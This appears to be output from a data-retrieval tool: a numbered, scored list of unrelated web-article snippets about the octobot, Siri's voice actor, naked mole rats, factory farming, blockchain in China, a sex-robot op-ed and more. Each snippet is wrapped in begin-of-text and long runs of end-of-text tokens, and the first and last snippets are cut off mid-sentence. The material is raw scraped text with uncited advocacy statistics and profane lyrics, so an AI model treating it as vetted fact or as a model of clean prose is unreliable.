browser. He has handed the reigns of Android software in 2013, and then CEO of the company a few years later. What was his secret to success? - Being humble. He was always called the “nice guy” at work and everyone seemed to like him. + +Satya Nadella, CEO of Microsoft since 2014. + +After Steve Balmer stepped down from his duties. Satya has been a true company man, having worked in Microsoft since 1992 after he quit Sun Microsystems. Nadella born in Hyderabad, graduated from the University of Mangalore with a BSC in electrical engineering and was selected to study in United States. He earned two masters' degrees: one in Comp Sci, from the University of Wisconsin, and another as an MBA from the University of Chicago. With both universities, not-ivy league status, Satya made is a point to succeed in the corporate world no matter what. His secret to success has always been to learn more every day. He’s quoted as saying - “Always keep learning,” he told the Deccan Chronicle. “You stop doing useful things if you don’t learn.” + +Ajit Jain + +“Ajit Jain made more money for Berkshire Hathaway than I probably have” said Warren Buff +================================================================================ +Rank = 64; Score = 667648.0 +<|begin_of_text|>This story appears in the May 2017 issue of National Geographic magazine. + +Banish your preconceptions of robots as stiff, herky-jerky metal machines. An “octobot” less than three inches wide is changing the robotics landscape. + +The octobot is the world’s first completely soft, autonomous, and untethered robot. It is free of wires, batteries, and any hard material—like its namesake, the octopus, which has no internal skeleton. + +A Harvard University research team led by engineering professors Robert Wood and Jennifer Lewis tried more than 300 designs before they came up with one that worked. And now the octobot could revolutionize the use of robots. Traditional robots are “fantastic for what they do in terms of automation, but they’re not geared toward human interaction,” Wood says. Soft robots provide a safer solution: “If they run into something, it’d be like bumping into a basketball. It won’t hurt you.” + +Before the octobot, soft robots were either hybrids—pliable exteriors with hard guts of batteries or wires—or soft models tethered to an external cord. The octobot eliminates these restrictions. It moves by pneumatic power: An internal circuit triggers chemical reactions, turning its liquid hydrogen peroxide fuel into a gas, which inflates the robot’s limbs and allows them to move. The whole assembly is created from silicone using a 3-D printer. + +The octobot is currently a prototype, but its writhing arms prove that the technology works. The goal, says Wood, is to find viable applications, such as in health care. Soft robots could be made from biocompatible and biodegradable materials—and, he says, might even be formed into capsules to be swallowed for more effective and less invasive endoscopies.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 65; Score = 655360.0 +<|begin_of_text|>Johannes Eisele/AFP/Getty Images + +There’s something not quite right about humanoid robots. They are cute up to a point, but once they become a bit too realistic, they often start to creep us out – a foible called the uncanny valley. Now Facebook wants robots to climb their way out of it. + +Researchers at Facebook’s AI lab have developed an expressive bot, an animation controlled by an artificially intelligent algorithm. The algorithm was trained on hundreds of videos of Skype conversations, so that it could learn and then mimic how humans adjust their expressions in response to each other. In tests, it successfully passed as human-like. + +What will happen when computers get access to your emotions? Find out in our expert talk at New Scientist Live + +To optimise its learning, the algorithm divided the human face into 68 key points that it monitored throughout each Skype conversation. People naturally produce nods, blinks and various mouth movements to show they are engaged with the person they are talking to, and eventually the system learned to do this too. + +Advertisement + +The bot was then able to look at a video of a human speaking, and choose in real time what the most appropriate facial response would be. If the person was laughing, for example, the bot might choose to open its mouth too, or tilt its head. + +The Facebook team then tested the system with panels of people who watched animations that included both the bot reacting to a human, and a human reacting to a human. The volunteers judged the bot and the human to be equally natural and realistic. + +However, as the animations were quite basic, it’s not clear whether a humanoid robot powered by this algorithm would have natural-seeming reactions. + +Additionally, learning the basic rules of facial communication might not be enough to create truly realistic conversation partners, says Goren Gordon at Tel Aviv University in Israel. “Actual facial expressions are based on what you are thinking and feeling.” + +In this case, the Facebook system ends up creating a kind of “average personality”, says Louis-Philippe Morency at Carnegie Mellon University in Pittsburgh. In future, more sophisticated bots might be able to pick from a range of personalities or adapt their own to match the person they are talking to. + +Robots aren’t so good at mastering these subtle elements of human interaction, says Gordon. We already know that humans prefer speaking with robots that mimic their own facial expression, he says, but now Facebook is trying to take robot conversations to the next level. “At some point we’ll get out of the uncanny valley and come out +================================================================================ +Rank = 66; Score = 647168.0 +<|begin_of_text|>UPDATE (11/29/12): Snippet of “Tell Me What They Mad For” below. The provided lyrics don’t match, though… + +Pusha T always speaks his mind, whether subliminally or directly (he detailed to HHW how his “New God Flow” verse was about Birdman)). The G.O.O.D. Music rapper, and one half of the Clipse, fires more shots at Lil Wayne and Birdman in a verse from a new Ludacris record called “Tell Me What They Mad For.” + +DaJaz1 posted a snippet of the track, but it appears to have since been removed. However, Push A Ton’s bars from the song, which also features Swizz Beatz, have been transcribed. Although he doesn’t name any names, it’s obvious who he is rapping. + +With your baby mama f-cking every rapper in the business Ni–as saying you was better when the drugs was in your system Now your crack swag gone ever since u came from prison Got you tweeting all stupid, is you skatin’, is you dissin’ Found out your Ghost leased and your Phantom just rented Won’t leave it in your name like Pac when he went missing Makaveli lives on so I’m riding on you b-tches. + +Damn. + +Since Ludacris has had issues with Big Sean and Drake, the finished product, which will appear on his forthcoming Ludaversal album, should be full of shots. We just hope if Weezy does respond in kind, it will be better than “Goulish.” + +MORE ON HIP-HOP WIRED! + +• 5 Reasons Why Rihanna Is Happiest With Chris Brown In Her Life [PHOTOS] + +• Pump It Up: 10 Rap Songs That Accidentally Turned Into Sports Anthems + +• 8 Things You Need To Know About Wiz Khalifa’s O.N.I.F.C. + +• Guitar Hero: 10 Interesting Facts About Jimi Hendrix [PHOTOS] + +• Katt Williams Leads Officers On A Chase In A Can Am Motorcycle [PHOTOS] + +• 11 Things We Learned From Nicki Minaj’s My Truth [PHOTOS] + +• Lil Wayne, Kanye West, Diddy, Scott Disick & More Celebrate DJ Khaled’s Birthday In LIV Nightclub [PHOTOS] + +• Beyoncé Shares New Shots Of Blue Ivy, Jay-Z [PHOTOS] + +— + +Photo: Pusha T<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 67; Score = 643072.0 +<|begin_of_text|>Brandon Vick/University of Rochester + +The same molecules that endow naked mole rats with springy, wrinkled skin also seem to prevent the homely rodents from contracting cancer. Research published on Nature's website today identifies a sugary cellular secretion that stops the spread of would-be tumours1. + +Naked mole rats (Heterocephalus glaber), which are more closely related to porcupines than rats, are freaks of nature. The short-sighted creatures spend their lives in subterranean colonies in the service of a single breeding queen — H. glaber is one of only two 'eusocial' mammals ever discovered. The rodent doesn’t feel the sting of acids or the burn of chilli peppers, and seems to be the only mammal that is unable to regulate its body temperature. + +However, the animal's longevity and impunity to cancer are the reason why biologist Andrei Seluanov keeps around 80 naked mole rats in a special facility near his lab at the University of Rochester in New York state. The rodents have been known to live for up to 32 years, and scientists have never seen one with cancer. Mice, by comparison, rarely live past the age of four and do often die of cancer. + +Nature Podcast Ewen Callaway spoke to Andrei Seluanov about his work on naked mole rats' resistance to cancer. You may need a more recent browser or to install the latest version of the Adobe Flash Plugin. + +In 2009, Seluanov’s team reported that the naked mole rat's fibroblasts (a cell type found in connective tissue) are sensitive to the presence of other cells, and in Petri dishes they grow less crowded than mouse fibroblasts do2. To the annoyance of his lab workers, the broth they used to nurture the cells often turned so viscous that it clogged the drains. + +“Our lab technician was unhappy because she needed to disassemble the system and clean all this gooey stuff,” Seluanov recalls. “I told my graduate student that we have to find out what the gooey substance is — it should be related to their cancer resistance. Of course, at that time it was just a wild guess.” + +Sticky situation + +The team soon discovered that the plumbing problem was the result of a sugar called hyaluronic acid (HA). Fibroblasts ooze HA and, along with collagen and other chemicals, it forms the extracellular matrix that gives tissues their shape and makes skin elastic. Naked mole rats, +================================================================================ +Rank = 68; Score = 643072.0 +<|begin_of_text|>Cruelty that would be illegal if it were inflicted on dogs or cats, such as neglect, mutilation, transport through all weather extremes, and gruesome and violent slaughter, is commonplace in animal agribusiness. Yet farmed animals are no less intelligent or capable of feeling pain than dogs and cats. + +2. Factory farms threaten our waterways. + +The meat industry has a record of egregious water pollution. In fact, animal excrement and other agricultural runoff from large-scale farms have polluted nearly one-third of rivers in the U.S. + +3. Workers are exposed to injury and illness. + +Workplace hazards include injuries, respiratory illness, and PTSD. Workers are also at risk for infection by antibiotic-resistant bacteria. Earlier this year, it was revealed that on average, one Tyson employee a month is injured by equipment and loses a finger or limb. + +4. Farmed animals are mutilated without painkillers. + +Dehorning, tail docking, debeaking, and castration are all mutilations performed daily on factory farms. These cruel acts are carried out without the use of anesthesia, and because of the filthy conditions, they often result in infection. + +5. Meat production wastes an incredible amount of water. + +It reportedly takes 576 gallons of water to produce one pound of pork, 880 gallons of water to produce one gallon of milk, and a whopping 1,799 gallons of water to produce one pound of beef. + +6. Factory farms are breeding grounds for antibiotic-resistant bacteria. + +Eighty percent of all antibiotics used in the U.S. are administered to farmed animals. While these drugs are sometimes used to prevent and treat illness, they’re also used in low doses to keep animals alive in filthy, disease-ridden conditions that would otherwise kill them. + +7. Animals on factory farms are denied everything that is important to them. + +Most farmed animals will never root in the soil, build nests, or do anything that is natural to them. They won't even feel the sun on their backs or breathe fresh air until the day they are loaded onto trucks bound for slaughter. + +8. Raising animals for food has a devastating impact on the climate. + +According to the United Nations Food and Agriculture Organization, carbon dioxide emissions from raising farmed animals make up about 15 percent of global human-induced emissions. In fact, the meat industry emits more greenhouse gases than all the transportation in the world combined! + +9. Some farmed animals literally can’t move. + +Many animals on factory farms live in spaces so small they can’t even turn around, lie down comfortably +================================================================================ +Rank = 69; Score = 638976.0 +<|begin_of_text|>It is in our nature to need stories. They are our earliest sciences, a kind of people-physics. Their logic is how we naturally think. They configure our biology, and how we feel, in ways long essential for our survival. + +Like our language instinct, a story drive—an inborn hunger for story hearing and story making—emerges untutored universally in healthy children. Every culture bathes their children in stories to explain how the world works and to engage and educate their emotions. Perhaps story patterns could be considered another higher layer of language. A sort of meta-grammar shaped by and shaping conventions of character types, plots, and social-rule dilemmas prevalent in our culture. + +“Stories the world over are almost always about people with problems,” writes Jonathan Gottschall. They display “a deep pattern of heroes confronting trouble and struggling to overcome.” So a possible formula for a story = character(s) + predicament(s) + attempted extrication(s). This pattern transmits social rules and norms, describing what counts as violations and approved reactions. Stories offer “feelings we don’t have to pay [full cost] for.” They are simulated experiments in people-physics, freeing us from the limits of our own direct experience. + +The "human mind is a story processor, not a logic processor," says Jonathan Haidt. Certainly we use logic inside stories better than we do outside. Leda Cosmides and John Tooby have shown that the Wason Selection Test can be solved by fewer than 10% as a logic puzzle, but by 70-90% when presented as a story involving detection of social-rule cheating. Such social-rule monitoring was evolutionarily crucial because as Alison Gopnik notes “other people are the most important part of our environment.” In our ultra-social species, social acceptance matters as much as food. Indeed violating social rules can exclude you from group benefits, including shared food. + +Darwin understood how our biology is fitted to the stories in our social environments, noting, “Many a Hindoo...has been stirred to the bottom of his soul by having partaken of unclean food.” The same thing eaten unknowingly would cause no reaction, so the story of the food, not the food itself, causes the “the soul shaking feeling of remorse.” Stories configure contextual triggers and the expected emotional reactions of our culture—perhaps defining a sort of emotional grammar. + +Any story we tell of our species, any science of human nature, that leaves out much of what and how we feel is false. +================================================================================ +Rank = 70; Score = 634880.0 +<|begin_of_text|>Researchers Jose Cordova of Yale University and Erich Astudillo of Chile’s Universidad de Santiago discovered a molecule they call Keep 32 that kills the bacteria responsible for all the trauma you suffered as a child, lying down blinded by the light as a masked man poked bits of metal in your mouth. Sometimes you don’t feel anything. Sometimes you feel funny. + +We all know how it works: Teeth + candy – brushing = cavities. The bacteria Streptococcus mutans metabolizes the sugar, turning it into lactic acid that slowly but surely dissolves the tooth enamel. The Keep 32 molecule kills this bacteria, thus helping you keep all 32 of your teeth in perfect shape. So, how is this better than fluoride? Well, for one, fluoride works by strengthening the tooth enamel, not killing the bacteria – it treats the symptoms and not the cause. Keep 32 goes directly to the cause of your grief. + +The patent-pending molecule appears to be quite versatile, and can reportedly be added into mouthwash, toothpaste, gum, candy and even proper food. Cordova and Astudillo are currently in talks to obtain funding for their trials, and if they succeed, we can expect dentally beneficial candy in 18 months. Considering how much money this can potentially make some people, I’m sure there won’t be a problem. + +But for now, I shall keep my joy in check, because it will all come to naught if the Keep 32 candy don’t taste like candy. + +(via Geek.com) + +Relevant to your interests<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 71; Score = 634880.0 +<|begin_of_text|>Media playback is unsupported on your device Media caption Meet the real Siri, and three other iconic voices of everyday technology. + +Millions of people hear their voices every day - but would you recognise them if you saw them walking down the street? + +Well maybe now you will. + +The BBC met the faces behind four of the most famous and iconic voices heard in technology today. + +Jon Briggs - The British 'Siri' + +Siri, Apple's voice-powered personal assistant, made its debut in June 2010. Since then, millions of the devices with the feature have been sold worldwide. + +Who needs humans? As the technology behind automated voices gets ever more advanced, we soon may be in a position where a believable, natural-sounding voice could be created from scratch. It would, unfortunately for those featured here, possibly mean the beginning of the end for voiceover artists. But should it? "Anything that is not human," says Jon, "it lacks the one quality that we of course have - which is emotion. "Until you can give inanimate objects emotion, then you're never going to be able to get over that particular problem." Sara believes the Speaking Clock should always remain a human voice due to its historical significance. "It's not just any other recording. It is something that has been through British history for so long, since 1936. "I cannot imagine anyone making that decision to say 'that's it, we're just putting it through a computer'. We'd be losing quite a lot." + +In the UK, the voice you will hear responding to commands belongs to Jon Briggs, an illustrious voiceover artist whose portfolio includes the likes of the Weakest Link, Radio 2 and Channel 4. + +Jon had offered up his voice to a firm that specialises in computer-generated speech - that is, taking Jon's voice but moulding it to say virtually any possible phrase. Apple, when creating Siri, picked out Jon - unbeknownst to him. + +"I discovered that I was being used as the voice of Siri when Rory Cellan-Jones, the BBC technology correspondent, suddenly started demonstrating it on BBC Breakfast. + +"I thought 'I recognise that voice!', and so it was true - and it's a slightly bizarre journey since then." + +It means that while his voice is now being played out countless times a day all over the country, Apple has not paid him - he only received the fee earned he when recording the original material. + +But, he says he's excited to be "in early" on what he believes is changing +================================================================================ +Rank = 72; Score = 630784.0 +<|begin_of_text|>http://en.wikipedia.org/wiki/File:FANUC_6-axis_welding_robots.jpg In 2011, Foreign Policy Magazine named Tyler Cowen #72 in their list of the "Top 100 Global Thinkers." + +He is a professor of economics at George Mason University and, along with Alex Tabarrok, he blogs at Marginal Revolution, one of the most popular economics sites on the internet. + +Tyler is a New York Times bestselling author, having written 13 books including Discover Your Inner Economist and The Great Stagnation. + +His latest book is Average Is Over which gives a fascinating look into where the country is headed, how income inequality, automation and artificial intelligence will change the way we work and live - and who will be the beneficiaries of those changes. + +Tyler and I spoke about the skills that will be important in the coming years, when it makes sense to order the worst sounding thing on the menu, and why the ending of "Star Wars" may be at odds with the future. + +My conversation with Tyler was quite long, so for brevity's sake I'm only going to post edited highlights here. + +If you want the extended interview I'll be sending it out in my weekly newsletter on Sunday. + +Join here. + +———-——— + +Listen To The Machines + +Eric: + +One of the most compelling concepts in Average Is Over is "listening to the machine." + +Tyler: + +The smarter machines become the more it shapes how human beings have to change. We used to be rewarded for sheer brainpower — smarts — but now if the machine is smarter than you or sometimes smarter than you there's a new scale, and that's knowing when to defer. It's about knowing when are you better and when is the machine better and, of course, increasingly, it's often the machine. I think of humility as a virtue, a practical virtue that's making a comeback. + +Eric: + +Who is poised to do well in the future and what can we do to better prepare for how you see things going? + +Tyler: + +The people who will do better are those who are very good at working with computers, programming and software. That's a rather obvious point but I think as income inequality increases people who are very good at positioning themselves in service sectors with some kind of marketing plan or somebody that can grab the attention of wealthier people will do well. Basically, the scarce skills for the future are all about psychology because computers right now still don't do that very well. The good jobs will be about branding. They're all about figuring +================================================================================ +Rank = 73; Score = 630784.0 +<|begin_of_text|>Leave some for the rest of us! + +Hey, you can only buy 15 of these. + +Harder, Fetter, Faster, Shirter. + +Han after all. + +Like the legend of the Phoenix + +All trends help our earnings + +What keeps ShirtWoot from hurting + +The force from our beginning + +We’ve gone too far + +But you know who we are + +These shirts buy us fast cars + +And at least it’s not Jar Jar. + +Come on and buy at least one + +Nerd shirts can never be done + +We know you like a good pun + +We hope you’ll all buy Fett Lucky + +Pop culture has no ending + +That gift keeps on giving + +Per se, it's not stealing + +If you want to leave - wait, don't actually do that, please. + +Come on and buy at least one + +Nerd shirts can never be done + +We know you like a good pun + +We hope you’ll all buy Fett Lucky + +Come on and buy at least one + +Nerd shirts can never be done + +We know you like a good pun + +We hope you’ll all buy Fett Lucky + +Come on and buy at least one + +Nerd shirts can never be done + +We know you like a good pun + +We hope you’ll all buy Fett Lucky + +(times a billion) + +(imminent shower of money) + +Back to top<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 74; Score = 630784.0 +<|begin_of_text|>Word in China is out about blockchain technology, as the government made clear in an Informatization Strategy published in December of 2016. The strategy states, "The internet, cloud computing, large data, artificial intelligence, machine learning, blockchain … will drive the evolution of everything - digital, network and intelligent services will be everywhere." + +It was an official endorsement for the new digital age and a big boost for blockchain technology. + +In a country with $5.5 trillion in digital payments last year (50 times the U.S.), blockchain is now a buzzword among the titans of industry. And in the race to participate, Chinese banks, builders, suppliers and retailers are pumping out blockchain solutions. + +Survival of the Fittest + +Even with millions of dollars, many of these new blockchains may not make it very far. In a recent WeChat post, Antshares executive Erik Zhang stated that 90 percent of the enterprise blockchains we are seeing are doomed to fail. Without an open-source code that anyone can build upon, Zhang argues, private solutions will not see the network effect of a healthy ledger. + +The big question for China, however, is whether a country known for its centralized authority, and a penchant for all things made-in-China, will allow an open-source, global standard solution sit on its internet. With Bitcoin, Ethereum and Hyperledger vying for dominance, there are big names within China making moves into the space. + +A few of these big names include: + +The People's Bank of China (PBOC) - The PBOC is reportedly close to the release of a government-backed digital RMB currency, which would put China at the frontier of digital currency adoption. And there are whispers within China that Shenzhen will be ground zero for the new digital economy. In September, Bloomberg reported that PBOC Vice Governor Fan Yifei wrote: "[T]he conditions are ripe for digital currencies, which can reduce operating costs, increase efficiency and enable a wide range of new applications." This would pave the way for blockchain startups in China to move forward in digital banking, finance, record-keeping, supply chains, IoT, AI and more. + +Wanxiang Blockchain Labs - Working with Ethereum, Wanxiang is the largest blockchain development backer in China. After purchasing 500,000 ETH tokens last year, they pledged $30 billion for the development of a smart city in Hangzhou. They offer open-source platforms for anyone to build upon, and launched an accelerator fund for developers, intending to put money into +================================================================================ +Rank = 75; Score = 630784.0 +<|begin_of_text|>According to reports today, a sex doll called “Samantha” – on display at Linz’s Arts Electronica Festival – was so severely "molested" by a group of men, it was sent home in desperate need of repair and "badly soiled". Despite the damage, the owner claimed the robot was designed to take a lot and would "pull through". + +The attack on Samantha is deeply disturbing. It’s a blatant example of the violence that can happen when we tell men they can do whatever they want to an object designed to resemble a woman’s body. + +There will be some who argue that this "attack" proves the need for sex robots as an outlet for male aggression. However, rather than shrugging our shoulders and accepting that male sexual violence is inevitable, we must instead challenge the causes and try to end it. + +The argument that sex robots reduce male sexual violence by giving men an outlet is deeply flawed. Firstly, it is not backed up in evidence – partly because the robots are too new to allow for proper research. But secondly, and perhaps most importantly, sex robots make male violence seem more normal, more acceptable and, indeed, inevitable. How? Because these robots are specifically designed to eroticise non-consent. + +A sex robot cannot give consent — it can only take whatever its owner throws at it. As a result, it not only invites abusive treatment, it demands it. The brands behind the robots explicitly encourage the owners to act out sexual entitlement and aggression on these plastic bodies, allowing for men to associate the sexual pleasure of their orgasm with non-consent. Why else would True Companions dolls have a “frigid Farrah” setting that encourages the owner to simulate rape? + +Two main causes lie behind sexual violence – male entitlement and power. These are both re-enforced by sex robots, and instead desperately need to be challenged if we can ever hope to end male violence against women and girls. + +Sex robots not only don’t challenge male entitlement to women’s bodies, they entrench it. Even the term “owner” for the buyer of the robot implies this. It sends a message that men can “own” a sex object which is designed for them to do whatever they like with. The owners are entitled to act out whatever fantasy they have on their doll. In the case of Samantha, this entitlement even gave the men a chance to break the robot’s fingers. + +Similarly, sexual violence is not about attraction or sexual desire, it is about power. After all, men don’t rape women +================================================================================ +Rank = 76; Score = 626688.0 +<|begin_of_text|>THERE’S A SCENE in Shakespeare’s “The Merchant of Venice” where Shylock argues that people share the similarity of being human, and thus should be treated with respect despite their differences: “If you prick us, do we not bleed? If you tickle us, do we not laugh?” + +A Friday performance of the Bard’s play by San Quentin State Prison inmates elicited laughter here and there, but ultimately drove home the notion that inmates are human beings and desire to be treated as more than just a number. + +The inmate actors said it’s difficult for people outside the prison gates to understand them, their emotions and the lives that led them to incarceration. Acting gives them an outlet to express those feelings and grow as individuals. + +Inmate Joey Mason, who played Salario, said acting has allowed him to get in touch with a side of himself he previously avoided. + +“It’s been an opportunity to be transparent, honest and open,” Mason said. “It’s a challenge. I used to run from these types of challenges because then I had to feel.” + +Mason, 53, is a Marin County resident serving 25 years to life under the three-strikes law, after a conviction for first-degree burglary. He and a dozen other inmates partnered with members of the Marin Shakespeare Company for the 10th year Friday to perform Shakespeare for about 150 inmates and visitors in the prison’s chapel. They had been preparing the performance for the past eight months, rehearsing Fridays for two hours. + +Inmate Kimani 